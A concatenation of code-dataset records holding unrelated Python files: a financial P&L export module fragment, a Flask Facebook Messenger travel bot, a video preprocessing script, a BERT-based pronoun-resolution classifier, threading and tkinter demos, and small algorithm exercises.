column_name=self.CALC_NAME, params=column_params\n )\n return [column]\n\nclass PLActExport(PLExport):\n #_END_DATE_REQUIRED = False\n WRITER_CLASSES = (PLActWriter,)\n\n def _getScenarioDates(self, parameters, end_date_str, calendar):\n end_date = FRTBUtility.getAcmDateFromString(end_date_str, calendar)\n start_date = calendar.AdjustBankingDays(end_date, -1)\n return start_date, end_date\n\n def _getColumns(self, parameters, column_params, start_date, end_date):\n column = self.makeColumn(\n column_id=FRTBCommon.IMA_PL_ACTUAL_COLUMN_ID,\n column_name=self.CALC_NAME, params=column_params\n )\n return [column]\n\n\nclass PLRiskExport(PLExport):\n _END_DATE_REQUIRED = False\n WRITER_CLASSES = (PLRiskWriter,)\n\n def _getScenarioAelVariables(self):\n scenarioFileSelection = FRTBExport.getInputFileSelector()\n ttScenarioFile = (\n 'The name or path to an external file contain 1-day scenario file.'\n )\n ael_vars = [\n #[VariableName,\n # DisplayName,\n # Type, CandidateValues, Default,\n # Mandatory, Multiple, Description, InputHook, Enabled]\n [self.CALC_NAME + 'oneDayScenarioFile',\n 'Risk theoretical scenario file_' + self._tab_suffix,\n scenarioFileSelection, None, scenarioFileSelection,\n 0, 1, ttScenarioFile, None, True],\n ] + super(PLRiskExport, self)._getScenarioAelVariables()\n return ael_vars\n\n def _getScenarioDates(self, parameters, end_date_str, calendar):\n assert parameters.get(self.CALC_NAME + 'oneDayScenarioFile'), \\\n self.CALC_NAME_LONG + ' scenario file required'\n start_date = end_date = None\n if end_date_str:\n end_date = FRTBUtility.getAcmDateFromString(end_date_str, calendar)\n start_date = calendar.AdjustBankingDays(end_date, -1)\n\n scenario_file = parameters[self.CALC_NAME + 'oneDayScenarioFile']\n scenario_details = FRTBUtility.getScenarioDetails(\n scenario_file=str(scenario_file).strip(),\n first_end_date=end_date_str, last_end_date=end_date_str,\n horizon=1, calendar=calendar\n )\n assert len(scenario_details) == 1, \\\n 'Expected to retrieve only a single scenario column'\n sd = scenario_details[0]\n assert (not start_date) or (start_date == sd.start_date), \\\n 'Start date incorrectly determined'\n assert (not end_date) or (end_date == sd.end_date), \\\n 'End date incorrectly determined'\n end_date = end_date if start_date else sd.end_date\n start_date = start_date or sd.start_date\n return start_date, end_date\n\n def _getColumns(self, parameters, column_params, start_date, end_date):\n scenario_file = parameters[self.CALC_NAME + 'oneDayScenarioFile']\n scenario_params = {\n acm.FSymbol('Scenario File'): str(scenario_file).strip(),\n acm.FSymbol('Scenario End Date'): 'Custom Date',\n acm.FSymbol('Scenario End Date Custom'): end_date,\n acm.FSymbol('Calendar'): parameters['scenarioCalendar'],\n acm.FSymbol('Risk Factor Setup'): parameters['riskFactorSetup']\n }\n scenario = self.makeDynamicScenario(\n template_name='FRTBRiskTheoreticalPLScenarioFromFile',\n scenario_params=scenario_params\n )\n scenario_dimension_names = ['Scenario File Scenario']\n column = self.makeColumn(\n column_id=FRTBCommon.IMA_PL_RISK_COLUMN_ID,\n column_name=self.CALC_NAME,\n scenario=scenario, params=column_params,\n dimension_names=scenario_dimension_names\n )\n return [column]\n","sub_path":"Extensions/FRTB Export/FPythonCode/FRTBIMAPLExport.py","file_name":"FRTBIMAPLExport.py","file_ext":"py","file_size_in_byte":10784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"632576533","text":"import os\nimport requests\nimport json\nfrom flask import Flask, request\nfrom dotenv import load_dotenv\nload_dotenv()\n\napp = Flask(__name__)\n\nFB_API_URL = 'https://graph.facebook.com/v2.6/me/messages'\nVERIFY_TOKEN = os.getenv('VERIFY_TOKEN')\nPAGE_ACCESS_TOKEN = os.getenv('PAGE_ACCESS_TOKEN')\n\ndata = {}\nwith open('assets/data.json') as json_file:\n data = json.load(json_file)\n\nbot_flow_counter = 0\nbot_flow = [\n {\n 'question': 'Hello 👋, {}, I am Cari your CariTravel bot, here to help you choose the right destination 🙂.',\n 'response': None,\n },\n {\n 'question': 'Let us begin!. Would you prefer to set some parameters or roll the dice?',\n 'payload': '1',\n 'response': [\n 'Set Parameters.',\n 'Roll dice.'\n ],\n },\n {\n 'question': 'Let me know what type of vacation it is.',\n 'payload': '2',\n 'response': [\n 'Family',\n 'Couples/Honeymoon',\n 'Friends',\n 'Single'\n ],\n },\n {\n 'question': 'What\\'s your favorite things to do on vacation? Are you into...',\n 'payload': '3',\n 'response': [\n 'Adventure',\n 'Food Experience',\n 'Beaches/Rivers', \n 'Culture',\n ],\n },\n {\n 'question': 'Are you or anybody in your group disabled in anyway?',\n 'payload': '4',\n 'response': [\n 'Yes',\n 'No',\n ],\n },\n {\n 'question': 'Are you interested in places with native languages outside your own?',\n 'payload': '5',\n 'response': [\n 'Yes',\n 'No',\n ],\n },\n]\n\n\ndef handleMessage(sender_psid, received_message):\n print('handleMessage')\n response = {}\n \n if ('quick_reply' in received_message.keys()):\n payload = received_message['quick_reply']['payload']\n response_message = received_message['text']\n if payload == bot_flow[1]['payload']:\n if(response_message == bot_flow[1]['response'][0]):\n response = postback_button_response(bot_flow[2]['question'], bot_flow[2]['payload'], bot_flow[2]['response'])\n elif(response_message == bot_flow[1]['response'][1]):\n response = {\n \"attachment\": {\n \"type\":\"template\",\n \"payload\": {\n \"template_type\":\"generic\",\n \"elements\":[\n {\n \"title\":\"Holiday Inn Resort Montego Bay\",\n \"image_url\":\"https://ihg.scene7.com/is/image/ihg/holiday-inn-resort-montego-bay-4130892904-16x5\",\n \"subtitle\":\"Jamaica\",\n \"default_action\": {\n \"type\": \"web_url\",\n \"url\": \"https://via.placeholder.com/\",\n \"messenger_extensions\": False,\n \"webview_height_ratio\": \"COMPACT\"\n },\n \"buttons\":[\n {\n \"type\":\"web_url\",\n \"url\":\"https://www.ihg.com/holidayinnresorts/hotels/us/en/montego-bay/mbjrh/hoteldetail?cm_mmc=GoogleMaps-_-RS-_-JM-_-MBJRH\",\n \"title\":\"Check it out\"\n }\n ] \n },\n {\n \"title\":\"Sheraton Santo Domingo Hotel\",\n \"image_url\":\"https://cache.marriott.com/marriottassets/marriott/SDQDS/sdqds-exterior-9012-hor-wide.jpg?interpolation=progressive-bilinear&downsize=1440px:*\",\n \"subtitle\":\"Dominican Republic\",\n \"default_action\": {\n \"type\": \"web_url\",\n \"url\": \"https://cache.marriott.com/marriottassets/marriott/SDQDS/sdqds-exterior-9012-hor-wide.jpg?interpolation=progressive-bilinear&downsize=1440px:*\",\n \"messenger_extensions\": False,\n \"webview_height_ratio\": \"COMPACT\"\n },\n \"buttons\":[\n {\n \"type\":\"web_url\",\n \"url\":\"https://www.marriott.com/hotels/travel/sdqds-sheraton-santo-domingo-hotel/?scid=bb1a189a-fec3-4d19-a255-54ba596febe2&y_source=1_Mjg2ODk3OC03MTUtbG9jYXRpb24uZ29vZ2xlX3dlYnNpdGVfb3ZlcnJpZGU=\",\n \"title\":\"Check it out\"\n }\n ] \n },\n {\n \"title\":\"Kalinago Beach Resort\",\n \"image_url\":\"https://kalinagobeachresort.com/wp-content/uploads/2015/08/resort.jpg\",\n \"subtitle\":\"Grenada\",\n \"default_action\": {\n \"type\": \"web_url\",\n \"url\": \"https://kalinagobeachresort.com/\",\n \"messenger_extensions\": False,\n \"webview_height_ratio\": \"COMPACT\"\n },\n \"buttons\":[\n {\n \"type\":\"web_url\",\n \"url\":\"https://kalinagobeachresort.com/\",\n \"title\":\"Check it out\"\n }\n ] \n }\n ],\n }\n }\n }\n\n elif payload == bot_flow[2]['payload']:\n response = postback_button_response(bot_flow[3]['question'], bot_flow[3]['payload'], bot_flow[3]['response'])\n\n elif payload == bot_flow[3]['payload']:\n response = postback_button_response(bot_flow[4]['question'], bot_flow[4]['payload'], bot_flow[4]['response'])\n \n elif payload == bot_flow[4]['payload']:\n response = postback_button_response(bot_flow[5]['question'], bot_flow[5]['payload'], bot_flow[5]['response'])\n\n elif payload == bot_flow[5]['payload']:\n response = {\n \"attachment\": {\n \"type\":\"template\",\n \"payload\": {\n \"template_type\":\"generic\",\n \"elements\":[\n {\n \"title\":\"Holiday Inn Resort Montego Bay\",\n \"image_url\":\"https://ihg.scene7.com/is/image/ihg/holiday-inn-resort-montego-bay-4130892904-16x5\",\n \"subtitle\":\"Jamaica\",\n \"default_action\": {\n \"type\": \"web_url\",\n \"url\": \"https://via.placeholder.com/\",\n \"messenger_extensions\": False,\n \"webview_height_ratio\": \"COMPACT\"\n },\n \"buttons\":[\n {\n \"type\":\"web_url\",\n \"url\":\"https://www.ihg.com/holidayinnresorts/hotels/us/en/montego-bay/mbjrh/hoteldetail?cm_mmc=GoogleMaps-_-RS-_-JM-_-MBJRH\",\n \"title\":\"Check it out\"\n }\n ] \n },\n {\n \"title\":\"Sheraton Santo Domingo Hotel\",\n \"image_url\":\"https://cache.marriott.com/marriottassets/marriott/SDQDS/sdqds-exterior-9012-hor-wide.jpg?interpolation=progressive-bilinear&downsize=1440px:*\",\n \"subtitle\":\"Dominican Republic\",\n \"default_action\": {\n \"type\": \"web_url\",\n \"url\": \"https://cache.marriott.com/marriottassets/marriott/SDQDS/sdqds-exterior-9012-hor-wide.jpg?interpolation=progressive-bilinear&downsize=1440px:*\",\n \"messenger_extensions\": False,\n \"webview_height_ratio\": \"COMPACT\"\n },\n \"buttons\":[\n {\n \"type\":\"web_url\",\n \"url\":\"https://www.marriott.com/hotels/travel/sdqds-sheraton-santo-domingo-hotel/?scid=bb1a189a-fec3-4d19-a255-54ba596febe2&y_source=1_Mjg2ODk3OC03MTUtbG9jYXRpb24uZ29vZ2xlX3dlYnNpdGVfb3ZlcnJpZGU=\",\n \"title\":\"Check it out\"\n }\n ] \n },\n {\n \"title\":\"Kalinago Beach Resort\",\n \"image_url\":\"https://kalinagobeachresort.com/wp-content/uploads/2015/08/resort.jpg\",\n \"subtitle\":\"Grenada\",\n \"default_action\": {\n \"type\": \"web_url\",\n \"url\": \"https://kalinagobeachresort.com/\",\n \"messenger_extensions\": False,\n \"webview_height_ratio\": \"COMPACT\"\n },\n \"buttons\":[\n {\n \"type\":\"web_url\",\n \"url\":\"https://kalinagobeachresort.com/\",\n \"title\":\"Check it out\"\n }\n ] \n }\n ],\n }\n }\n }\n callSendAPI(sender_psid, response)\n return\n\n # Checks if the message contains text\n if ('text' in received_message.keys()):\n # if received_message['text'].lower() == 'get started'.lower() or received_message['text'] != \"\":\n try:\n first_name = retrieve_user_information(sender_psid)['first_name']\n except:\n first_name = ''\n\n # Send Intro response message\n response = {\n \"text\": bot_flow[0]['question'].format(first_name)\n }\n callSendAPI(sender_psid, response)\n\n # Send Intro response message\n response = postback_button_response(bot_flow[1]['question'], bot_flow[1]['payload'], bot_flow[1]['response'])\n callSendAPI(sender_psid, response)\n return\n\n \ndef handlePostback(sender_psid, received_postback):\n print('handlePostback')\n response = {}\n \n # Get the payload for the postback\n payload = received_postback['payload']\n print(payload)\n callSendAPI(sender_psid, response)\n\n\ndef postback_button_response(text, payload, titles):\n\n quick_replies = []\n for title in titles:\n quick_replies.append({\n 'content_type': 'text',\n 'title': title,\n 'payload' : payload,\n })\n\n return {\n 'text': text,\n 'quick_replies': quick_replies\n }\n\ndef sender_action(sender_action):\n # Construct the message body\n request_body = {\n \"sender_action\": sender_action\n }\n\n try:\n # Send the HTTP request to the Messenger Platform\n response = requests.post(\n FB_API_URL, \n params= {\"access_token\": PAGE_ACCESS_TOKEN },\n json= request_body\n )\n\n # If the response was successful, no Exception will be raised\n response.raise_for_status()\n except requests.HTTPError as http_err:\n print(f'HTTP error occurred: {http_err}') # Python 3.6\n pass\n except Exception as err:\n print(f'Other error occurred: {err}') # Python 3.6\n pass\n else:\n print('Success!')\n \n\ndef get_started():\n # Construct the message body\n request_body = {\n \"get_started\": {\"payload\": \"\"}\n }\n\n try:\n # Send the HTTP request to the Messenger Platform\n response = requests.post(\n FB_API_URL, \n params= {\"access_token\": PAGE_ACCESS_TOKEN },\n json= request_body\n )\n\n # If the response was successful, no Exception will be raised\n response.raise_for_status()\n except requests.HTTPError as http_err:\n print(f'HTTP error occurred: {http_err}') # Python 3.6\n pass\n except Exception as err:\n print(f'Other error occurred: {err}') # Python 3.6\n pass\n else:\n print('Success!')\n\ndef retrieve_user_information(sender_psid):\n try:\n # Send the HTTP request to the Messenger Platform\n response = requests.get(\"https://graph.facebook.com/{}?fields=first_name,last_name,profile_pic&access_token={}\".format(sender_psid, PAGE_ACCESS_TOKEN))\n\n # If the response was successful, no Exception will be raised\n response.raise_for_status()\n\n return json.loads(response.content)\n except requests.HTTPError as http_err:\n pass\n print(f'HTTP error occurred: {http_err}') # Python 3.6\n except Exception as err:\n print(f'Other error occurred: {err}') # Python 3.6\n pass\n else:\n print('Success!')\n\n\ndef callSendAPI(sender_psid, response, sender_action = None):\n # Construct the message body\n request_body = {\n \"recipient\": {\n \"id\": sender_psid\n },\n \"message\": response,\n \"sender_action\": sender_action\n }\n\n try:\n # Send the HTTP request to the Messenger Platform\n response = requests.post(\n FB_API_URL, \n params= {\"access_token\": PAGE_ACCESS_TOKEN },\n json= request_body\n )\n\n # If the response was successful, no Exception will be raised\n response.raise_for_status()\n except requests.HTTPError as http_err:\n print(f'HTTP error occurred: {http_err}') # Python 3.6\n pass\n except Exception as err:\n print(f'Other error occurred: {err}') # Python 3.6\n pass\n else:\n print('Success!')\n \n\n@app.route(\"/webhook\", methods=['GET','POST'])\ndef listen():\n if request.method == 'POST':\n \n # Parse the request body from the POST\n body = request.json\n\n # Check the webhook event is from a page subscription\n if (body['object'] == 'page'):\n for entry in body['entry']:\n\n # Gets the body of the webhook event\n webhook_event = entry['messaging'][0]\n # print('webhook_event:', webhook_event)\n\n # Get the sender PSID\n sender_psid = webhook_event['sender']['id']\n # print('sender_psid:', sender_psid)\n \n if ('message' in webhook_event.keys()):\n handleMessage(sender_psid, webhook_event['message'])\n elif ('postback' in webhook_event.keys()):\n handlePostback(sender_psid, webhook_event['postback'])\n return 'EVENT_RECEIVED', 200\n else:\n return '', 404\n\n if request.method == 'GET':\n # Parse params from the webhook verification request\n mode = request.args.get('hub.mode')\n token = request.args.get('hub.verify_token')\n challenge = request.args.get('hub.challenge')\n \n # Check if a token and mode were sent\n if (mode and token):\n\n # Check if the mode and token sent are correct\n if(mode == 'subscribe' and token == VERIFY_TOKEN):\n print('WEBHOOK_VERIFIED')\n return challenge, 200\n else:\n return '', 403\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"590319198","text":"import numpy as np\nimport sys\nimport cv2\nimport os\nimport random\nfrom sklearn.model_selection import train_test_split\n\n\ndef getListOfFiles(dirName):\n # create a list of file and sub directories \n # names in the given directory \n listOfFile = os.listdir(dirName)\n allFiles = list()\n # Iterate over all the entries\n for entry in listOfFile:\n # Create full path\n fullPath = os.path.join(dirName, entry)\n # If entry is a directory then get the list of files in this directory \n if os.path.isdir(fullPath):\n allFiles = allFiles + getListOfFiles(fullPath)\n else:\n allFiles.append(fullPath)\n return allFiles\ndef getFrames(fileN, aug):\n framelist= []\n video = cv2.VideoCapture(fileN)\n while True:\n done, frame = video.read()\n if int(video.get(cv2.CAP_PROP_POS_FRAMES)) % frames != 0:\n continue\n if not done:\n video.release()\n break\n if aug:\n frame = cv2.flip(frame, 1)\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = cv2.resize(frame, (int(1280/divisor), int(720/divisor)))\n frameList.append(frame)\n return frameList\n \n\nif __name__ == \"__main__\":\n size =1282\n frames = 2\n divisor = 8\n aug = True\n \n name = getListOfFiles(sys.argv[1])\n #Shuffle images so positive and negative are next to each other\n random.shuffle(name)\n name.sort();\n x=[]\n y=[]\n for i, fileN in enumerate(name):\n print(i)\n #process frames in a video\n frameList = getFrames(fileN, False)\n x.append(frameList)\n #data augmentation\n if aug:\n frameList = getFrames(fileN, True)\n x.append(frameList)\n tempName = fileN.split(\"/\")\n if tempName[-2] == \"positive\":\n y.append(1)\n if aug:\n y.append(1)\n \n else:\n y.append(0)\n if aug:\n y.append(0)\n #print(x.shape)\n x, x_val, y, y_val = train_test_split(x, y, test_size=.1)\n np.save('x', x)\n #if one channel use this format for x and x_val\n #x = x[:, :, :, :, np.newaxis]\n x_val = np.load('x_val.npy')\n np.save('x_val', x_val)\n np.save('y', y)\n np.save('y_val', y_val)\n","sub_path":"video_process.py","file_name":"video_process.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"172177005","text":"import numpy as np\nimport pandas as pd \nimport os\nimport gc\nimport zipfile\nfrom tqdm import tqdm\nimport re\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import log_loss\n\nimport modeling\nimport extract_features\nimport tokenization\n\nval_df = pd.read_table('gap-validation.tsv', index_col='ID').reset_index(drop=True).rename(columns={\"A\": \"A_Noun\", \"B\": \"B_Noun\"})\ntest_df = pd.read_table('gap-validation.tsv', index_col='ID').reset_index(drop=True).rename(columns={\"A\": \"A_Noun\", \"B\": \"B_Noun\"})\ndev_df = pd.read_table('gap-development.tsv', index_col='ID').reset_index(drop=True).rename(columns={\"A\": \"A_Noun\", \"B\": \"B_Noun\"})\n\ndef get_features(df):\n\n df['section_min'] = df[['Pronoun-offset', 'A-offset', 'B-offset']].min(axis=1)\n df['Pronoun-offset2'] = df['Pronoun-offset'] + df['Pronoun'].map(len)\n df['A-offset2'] = df['A-offset'] + df['A_Noun'].map(len)\n df['B-offset2'] = df['B-offset'] + df['B_Noun'].map(len) \n df['section_max'] = df[['Pronoun-offset2', 'A-offset2', 'B-offset2']].max(axis=1)\n df['A-dist'] = (df['Pronoun-offset'] - df['A-offset']).abs()\n df['B-dist'] = (df['Pronoun-offset'] - df['B-offset']).abs()\n df['number_of_chars'] = df['Text'].apply(lambda x : len(str(x)))\n df['Number_of_words'] = df['Text'].apply(lambda x : len(x.split()))\n df['unique_number_of_words'] = df['Text'].apply(lambda x : len(set(x.split())))\n # df[\"number_of_stopwords\"] = df[\"Text\"].apply(lambda x: len([w for w in str(x).lower().split() if w in stop]))\n # df[\"number_of_punctuations\"] = df['Text'].apply(lambda x: len([c for c in str(x) if c in string.punctuation]))\n df['upper'] = df['Text'].apply(lambda x : len([w for w in str(x).split() if str(w).isupper() ]))\n df['lower'] = df['Text'].apply(lambda x : len([w for w in str(x).split() if str(w).islower() ]))\n df['A-dist-abs'] = (df['Pronoun-offset'] - df['A-offset']).abs()\n df['B-dist-abs'] = (df['Pronoun-offset'] - df['B-offset']).abs()\n return df\n\nval_df = get_features(val_df)\ntest_df = get_features(test_df)\ndev_df = get_features(dev_df)\n\nwith zipfile.ZipFile(\"uncased_L-12_H-768_A-12.zip\", \"r\") as zip_ref:\n zip_ref.extractall()\n\ndef count_char(text, offset): \n count = 0\n for pos in range(offset):\n if text[pos] != \" \": count +=1\n return count\n\ndef candidate_length(candidate):\n count = 0\n for i in range(len(candidate)):\n if candidate[i] != \" \": count += 1\n return count\n\ndef count_token_length_special(token):\n count = 0\n special_token = [\"#\", \" \"]\n for i in range(len(token)):\n if token[i] not in special_token: count+=1\n return count\n\ndef embed_by_bert(df):\n\n text = df['Text']\n text.to_csv('input.txt', index=False, header=False)\n os.system(\"python3 extract_features.py \\\n --input_file=input.txt \\\n --output_file=output.jsonl \\\n --vocab_file=uncased_L-12_H-768_A-12/vocab.txt \\\n --bert_config_file=uncased_L-12_H-768_A-12/bert_config.json \\\n --init_checkpoint=uncased_L-12_H-768_A-12/bert_model.ckpt \\\n --layers=-1 \\\n --max_seq_length=256 \\\n --batch_size=8\")\n \n bert_output = pd.read_json(\"output.jsonl\", lines = True)\n bert_output.head()\n \n os.system(\"rm input.txt\")\n os.system(\"rm output.jsonl\")\n \n index = df.index\n columns = [\"emb_A\", \"emb_B\", \"emb_P\", \"label\"]\n emb = pd.DataFrame(index = index, columns = columns)\n emb.index.name = \"ID\"\n \n for i in tqdm(range(len(text))):\n \n features = bert_output.loc[i, \"features\"]\n P_char_start = count_char(df.loc[i, 'Text'], df.loc[i, 'Pronoun-offset'])\n A_char_start = count_char(df.loc[i, 'Text'], df.loc[i, 'A-offset'])\n B_char_start = count_char(df.loc[i, 'Text'], df.loc[i, 'B-offset'])\n A_length = candidate_length(df.loc[i, 'A_Noun'])\n B_length = candidate_length(df.loc[i, 'B_Noun'])\n \n emb_A = np.zeros(768)\n emb_B = np.zeros(768)\n emb_P = np.zeros(768)\n \n char_count = 0\n cnt_A, cnt_B = 0, 0\n \n for j in range(2, len(features)):\n token = features[j][\"token\"]\n token_length = count_token_length_special(token)\n if char_count == P_char_start:\n emb_P += np.asarray(features[j][\"layers\"][0]['values']) \n if char_count in range(A_char_start, A_char_start+A_length):\n emb_A += np.asarray(features[j][\"layers\"][0]['values'])\n cnt_A += 1\n if char_count in range(B_char_start, B_char_start+B_length):\n emb_B += np.asarray(features[j][\"layers\"][0]['values'])\n cnt_B += 1 \n char_count += token_length\n \n emb_A /= cnt_A\n emb_B /= cnt_B\n \n label = \"Neither\"\n if (df.loc[i,\"A-coref\"] == True):\n label = \"A\"\n if (df.loc[i,\"B-coref\"] == True):\n label = \"B\"\n\n emb.iloc[i] = [emb_A, emb_B, emb_P, label]\n \n return emb\n\n# %%time\nval_bert_emb = embed_by_bert(val_df)\ntest_bert_emb = embed_by_bert(test_df)\ndev_bert_emb = embed_by_bert(dev_df)\n\ndef featurize(embedding_df):\n \n pronoun_embs, a_embs, b_embs, labels = [], [], [], []\n \n for i in tqdm(range(len(embedding_df))):\n \n pronoun_embs.append(embedding_df.loc[i, \"emb_P\"])\n a_embs.append(embedding_df.loc[i, \"emb_A\"])\n b_embs.append(embedding_df.loc[i, \"emb_B\"])\n\n label_map = {'A': 0, 'B': 1, 'Neither': 2}\n labels.append(label_map[embedding_df.loc[i, \"label\"]])\n\n \n a_embs, b_embs, = np.asarray(a_embs).astype('float'), np.asarray(b_embs).astype('float'), \n pronoun_embs = np.asarray(pronoun_embs).astype('float')\n a_embs[np.isnan(a_embs)] = 0\n b_embs[np.isnan(b_embs)] = 0\n pronoun_embs[np.isnan(pronoun_embs)] = 0\n \n return np.concatenate([a_embs, b_embs, pronoun_embs], axis=1), np.asarray(labels)\n\nX_train, y_train = featurize(pd.concat([val_bert_emb, dev_bert_emb]).sort_index().reset_index())\n\nprint(X_train.shape, y_train.shape)\n\nfrom sklearn import linear_model\n\nlogit = LogisticRegression(C=1, random_state=23, solver='lbfgs', multi_class='multinomial', max_iter=300, n_jobs=8)\n\n# %%time\nlogit.fit(X_train, y_train)\n\n\"\"\"## Prediction for stage 1 test set\"\"\"\n\n#!cp gap-development.tsv stage1_test.tsv\n\nstage1_test_df = pd.read_table('test_stage_2.tsv', index_col='ID').reset_index(drop=True).rename(columns={\"A\": \"A_Noun\", \"B\": \"B_Noun\"})\n\nstage1_test_df = get_features(stage1_test_df)\n\nstage1_test_bert_emb = embed_by_bert(stage1_test_df)\n\nX_test, y_test = featurize(stage1_test_bert_emb)\n\nlogit_test_pred = logit.predict_proba(X_test)\nprint(log_loss(y_test, logit_test_pred))\n\nsubmission = pd.read_csv(\"sample_submission_stage_2.csv\", index_col = \"ID\")\nsubmission[\"A\"] = logit_test_pred[:,0]\nsubmission[\"B\"] = logit_test_pred[:,1]\nsubmission[\"NEITHER\"] = logit_test_pred[:,2]\nsubmission.to_csv(\"submission.csv\")\n","sub_path":"GAP/logistic_regression_on_bert.py","file_name":"logistic_regression_on_bert.py","file_ext":"py","file_size_in_byte":7045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"635166009","text":"\nimport threading\nimport time\n \n# 定义一个全局变量\n#number = 0\nlist1=[\n {\n \"code\":\"false\",\n \"id\":\"123\",\n \"name\":\"黄同学\"\n },{\n \"code\":\"false\",\n \"id\":\"456\",\n \"name\":\"张大\"\n },{\n \"code\":\"false\",\n \"id\":\"789\",\n \"name\":\"李工\"\n },{\n \"code\":\"false\",\n \"id\":\"1011\",\n \"name\":\"李工\"\n },{\n \"code\":\"false\",\n \"id\":\"1112\",\n \"name\":\"李工\"\n },{\n \"code\":\"false\",\n \"id\":\"1213\",\n \"name\":\"李工\"\n },{\n \"code\":\"false\",\n \"id\":\"1314\",\n \"name\":\"李工\"\n }\n]\nmutex = threading.Lock()\nDATA=[]\n'''创建一个互斥锁,默认是没有上锁的'''\ndef test1():\n global DATA\n '''上锁'''\n \n while True:\n for i in list1: \n #mutex.acquire() \n DATA.append(i)\n # if i==50:\n # print(\"第50位学生被卡在这里3秒\")\n # time.sleep(30)\n \n #print(\"number\",DATA) \n # DATA.append(i)\n # DATA.append(i)\n #mutex.release()\n #print(\"number\",DATA) \n time.sleep(10)\n \n # for i in range(temp):\n # number += 1\n '''解锁'''\n \n #print(\"-----in test1 number=%s-----\" % number)\n \ndef test2():\n global DATA\n '''上锁'''\n \n while True: \n if DATA:\n for i in DATA:\n mutex.acquire()\n #print(\"data[0]\",DATA[0])\n if DATA[0][\"code\"]==\"true\":\n print(\"该学生请假了\",DATA[0])\n if DATA[0][\"code\"]==\"false\":\n print(\"该学生没请假\",DATA[0])\n DATA.remove(DATA[0])\n mutex.release()\n print(\"number1\",DATA)\n \n # for i in number:\n # number.remove(i) \n #time.sleep(5)\n # for i in range(temp):\n # number += 1\n '''解锁'''\n \n #print(\"-----in test2 number=%s-----\" % number)\ndef test3():\n global list1\n time.sleep(15)\n print(\"开始运行\")\n list1[1][\"code\"]=\"true\"\ndef main():\n \n t1 = threading.Thread(target=test1) # 加上要传递的参数,元组类型\n t2 = threading.Thread(target=test2)\n t3 = threading.Thread(target=test1)\n t1.start()\n t2.start()\n #t3.start()\n \n #time.sleep(2)\n \n #print(\"-----in main number=%s-----\"% number)\n \nif __name__ == '__main__':\n main()\n'''\n旧的方案DATA数据堆积没有删除\n\n实现思路\n一个线程:学校每60s检测一次append到DATA中\n一个线程:一直循环DATA数据,删掉第一个\n问题:有可能DATA数据太多导致另一个线程还没有删完\n来了很多数据,造成不是实时或者延迟\n数据量小的时候不易察觉\n\n一个线程访问5000个同学假如某个学生卡在那里了\n假如这个线程append加了锁,比如第2000名学生卡在那里,append到DATA里,\n他会一直等到那个学生请求成功才会执行别的线程,所以append时候不加锁,\n别的线程要想一直删除DATA里的数据,会因为这第2000名学生,删除不掉前1999名学生\n\n好的解决方案\n#三个线程\n向学校的接口请求,学校有多少个学生,然后每个学生判断是否请假,然后再推送机器里比如耗时90s,可以缩短为30s\n1.请求学校有多少个学生\n2.那个学生是否请假\n3.那个学生是要添加的还是删除的\n'''\n\n","sub_path":"MQ1/后期优化/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"279466685","text":"def minus26(idx):\n while idx >= 26:\n idx = idx - 26\n return idx\n \nN = int(input())\nS = list(input())\n\nalphabet = ['A', 'B', 'C', 'D', 'E', 'F',\n 'G', 'H', 'I', 'J', 'K', 'L',\n 'M', 'N', 'O', 'P', 'Q', 'R',\n 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n\nS_idx = [alphabet.index(s)+N for s in S] \nS_idx = [minus26(idx) for idx in S_idx]\nprint(''.join([alphabet[idx] for idx in S_idx]))\n","sub_path":"ABC146B.py","file_name":"ABC146B.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"62364563","text":"import datetime\nimport tkinter\nimport queue\n\nmytempo = 0\nque = queue.Queue(4)\n\ndef page1_tempo():\n global mytempo\n current_time = datetime.datetime.now()\n current_time = str(current_time).split()[1].split(':')\n minute = int(current_time[1])\n second = float(current_time[2])\n time_for_tempo = minute * 60 + second\n\n if que.qsize() < 3:\n que.put(time_for_tempo)\n else:\n mytempo = int(60 * 4 / (time_for_tempo - que.get()))\n que.put(time_for_tempo)\n\n catch_tempo.configure(text=mytempo)\n\n\ndef page1():\n tempo_button = tkinter.Button(window, text=\"tempo\", height=10, width=33, command=page1_tempo)\n tempo_button.grid(row=1, column=2)\n window.mainloop()\n\nwindow = tkinter.Tk()\nwindow.title(\"Time_Table\")\nwindow.geometry(\"1285x673+100+10\")\nwindow.resizable(False, False)\n\ncatch_tempo = tkinter.Button(window, text=mytempo, height=10, width=33)\ncatch_tempo.grid(row=2, column=3)\npage1()","sub_path":"oldfiles/find_tempo.py","file_name":"find_tempo.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"404117498","text":"# -*- coding:utf-8 -*-\n# @Time: 2020/7/11 8:10 上午\n# @Author: duiya duiyady@163.com\n\n\n\"\"\"\n给定一个整数数组 nums,按要求返回一个新数组 counts。数组 counts 有该性质: counts[i] 的值是  nums[i] 右侧小于 nums[i] 的元素的数量。\n示例:\n输入: [5,2,6,1]\n输出: [2,1,1,0]\n解释:\n5 的右侧有 2 个更小的元素 (2 和 1).\n2 的右侧仅有 1 个更小的元素 (1).\n6 的右侧有 1 个更小的元素 (1).\n1 的右侧有 0 个更小的元素.\n\"\"\"\n\n# 时间复杂度太高\ndef countSmaller(nums):\n if len(nums) == 0:\n return\n tmp_nums = sorted(set(nums))\n tmp_count = [0] * len(tmp_nums)\n result = [0]*len(nums)\n index = {tmp_nums[i]: i for i in range(len(tmp_nums))}\n for i in reversed(range(len(nums))):\n result[i] = sum(tmp_count[: index[nums[i]]])\n tmp_count[index[nums[i]]] += 1\n return result\n\n\nif __name__ == '__main__':\n 